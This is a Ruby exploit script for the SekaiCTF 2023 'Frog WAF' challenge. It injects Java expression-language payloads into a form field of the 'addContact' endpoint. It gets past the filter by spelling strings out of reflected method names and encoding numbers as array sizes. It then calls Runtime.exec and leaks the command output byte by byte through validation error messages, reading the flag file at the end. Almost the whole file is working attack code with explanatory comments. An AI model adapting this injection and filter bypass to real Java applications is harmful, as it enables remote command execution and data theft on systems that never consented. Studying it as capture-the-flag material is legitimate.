SekaiCTF 2023 Frog WAF
require 'net/http' | |
require 'json' | |
# ENV['http_proxy'] = 'http://127.0.0.1:8080' # Burp Listener
# Challenge target: every request in this script goes to this host over plain HTTP
# (Net::HTTP.new with no port argument defaults to 80) and to this one path; the
# client object is shared by send_payload.
$domain = 'frog-waf.chals.sekai.team'
$endpoint = "/addContact"
$http = Net::HTTP.new($domain)
# Renders the integer `num` as a comma-separated list of `num` empty array literals,
# e.g. 3 -> "[],[],[]" and 0 -> "". Wrapped in `[...]` and followed by `.size()` on the
# Java side this evaluates to `num` without a single digit character appearing.
def array_int(num)
  Array.new(num, '[]').join(',')
end
# Posts one contact record whose `country` field wraps `payload` in `${...}` and returns
# the text of the first validation violation with its last 23 characters removed.
#
# Uses the file-level `$http` and `$endpoint`. This is the script's only channel to the
# server: the `violations[0].message` of the JSON error response appears to carry the
# server's rendering of the `country` value. From the defender's side the lesson is that
# the field is both interpreted and echoed back in an error message — treating it as
# opaque data at either point removes the oracle.
def send_payload(payload)
  body = {
    "description" => "Maiky",
    "firstName" => "Maiky",
    "lastName" => "Maiky",
    "country" => "${%s}" % [payload]
  }.to_json
  headers = { 'Content-Type' => 'application/json' }
  response = $http.post($endpoint, body, headers)
  message = JSON.parse(response.body)["violations"][0]["message"]
  # NOTE(review): the 23-character suffix dropped here is presumably a fixed trailer of
  # the server's message — confirm against a real response.
  message[0...-23]
end
# Fills the global `$charlist` with the text the oracle returns for
# `[].getClass().getMethods()[i]` for i = 0, 1, 2, ... until an index yields an empty
# message. Each entry is presumably a method signature string; later payload builders
# slice characters out of these entries. Returns nil.
def get_charlist
  $charlist = []
  loop do
    probe = "[].getClass().getMethods()[[%s].size()]" % [array_int($charlist.length)]
    element = send_payload(probe)
    break if element.empty?
    $charlist << element
  end
end
# Spells out `og_payload` as a Java expression that contains no string literal: the text
# is assembled from substrings of the `$charlist` entries, each slice written as
#   [].getClass().getMethods()[<i>].toString().substring(<start>,<end>)
# with every integer encoded by array_int(..) followed by `.size()`, so no digit appears.
#
# Walks the charlist entries in order; for each entry it consumes the longest prefix of
# the still-unspelled text that the entry contains (the candidate prefix is shortened one
# character at a time until `include?` succeeds). With `isUpper` set the lookup uses the
# lowercased text and `.toUpperCase()` is appended to the whole expression.
#
# `payload[7..-1]` strips the leading ".concat", so the result starts with "(".
# Returns nil (or raises NoMethodError when isUpper) if nothing was emitted, because
# `""[7..-1]` is nil. Text that no entry contains is silently left out: the `each` over
# entries ends whether or not `completed` reached `og_payload.length`.
def get_payload_subcall(og_payload,isUpper)
  search = og_payload
  completed = 0
  payload = ""
  (0...$charlist.length).each do |line|
    while completed != og_payload.length
      if $charlist[line].include?(isUpper ? search.downcase : search)
        # Emit one substring slice of entry `line` covering the matched prefix.
        payload += ".concat([].getClass().getMethods()[[" + array_int(line) + "].size()].toString().substring([" + array_int($charlist[line].index(isUpper ? search.downcase : search)) + "].size(),[" + array_int($charlist[line].index(isUpper ? search.downcase : search)+search.length) + "].size()))"
        completed+=search.length
        search = og_payload[completed..-1]
        break
      else
        # Not found: try a one-character-shorter prefix against the same entry.
        search = search[0..-2]
      end
    end
  end
  return isUpper ? payload[7..-1]+".toUpperCase()" : payload[7..-1]
end
# Special chars use -> java.lang.Character
# Builds an expression for a single non-word character: looks up java.lang.Character by
# name via the class's method table (`forName` is itself spelled with get_payload), calls
# its method at hard-coded index 39 with the character's code point, and takes element 0
# of the result. Only `special_char.codepoints[0]` is used.
#
# NOTE(review): index 39 depends on the method ordering of the target JVM; which
# Character method it selects cannot be confirmed from this file.
def get_special_char(special_char)
  klass = "[].getClass()[#{get_payload('forName')}](#{get_payload('java.lang.Character')})"
  "(#{klass}.getMethods()[[#{array_int(39)}].size()].invoke(null, [#{array_int(special_char.codepoints[0])}].size())[[].size()])"
end
# Encodes an arbitrary string `og_payload` as a chain of `.concat(...)` calls.
#
# The text is split into runs of uppercase letters, runs of lowercase letters / dots /
# spaces, runs of digits, and runs of other non-word characters; each run is rendered by
# the matching builder (get_payload_subcall for letters, `[...].size().toString()` for a
# number, get_special_char for anything else). `[7..-1]` drops the leading ".concat" so
# the returned expression begins with "(". Returns nil for an empty input, since
# `""[7..-1]` is nil.
def get_payload(og_payload)
  pieces = og_payload.scan(/[A-Z]+|[a-z\. ]+|\d+|[^\w\d\s]+/).map do |section|
    case section
    when /[A-Z]/ then get_payload_subcall(section, true)
    when /[a-z\. ]/ then get_payload_subcall(section, false)
    when /\d+/ then "[" + array_int(section.to_i) + "].size().toString()"
    when /[^\w\d\s]+/ then get_special_char(section)
    end
  end
  chain = pieces.compact.map { |piece| ".concat(#{piece})" }.join
  chain[7..-1]
end
# Runs `code` on the target through the injected expression and returns its stdout.
#
# The expression resolves java.lang.Runtime via `forName`, invokes the method at fixed
# index 6 of its method table with no receiver (presumably the static getRuntime()),
# calls `.exec(code)` and reads the whole output with `readAllBytes()`. Because the
# oracle returns one value per request, the byte array is then fetched one index at a
# time: each reply is parsed as a decimal byte and appended via `chr`, and the partial
# output is printed after every byte. Stops at the first empty reply.
def exec_code(code)
  runtime = "[].getClass()[#{get_payload('forName')}](#{get_payload('java.lang.Runtime')}).getMethods()[[[],[],[],[],[],[]].size()].invoke(null)"
  final_payload = "#{runtime}.exec(#{get_payload(code)}).getInputStream().readAllBytes()"
  result = ""
  loop do
    element = send_payload(final_payload + ("[[%s].size()]" % [array_int(result.length)]))
    break if element.empty?
    result += element.to_i.chr
    puts result
  end
  result
end
# SETUP THE CHARLIST
# Entry point: first harvest the method-name text the oracle exposes (get_charlist is
# one request per entry, hence the wait), then use it to spell out and run the command.
puts "[+] Setting up the charlist, this may take a while"
get_charlist
exec_code "cat flag-a6cd856505af7f809c24be3ccdfe5faf.txt"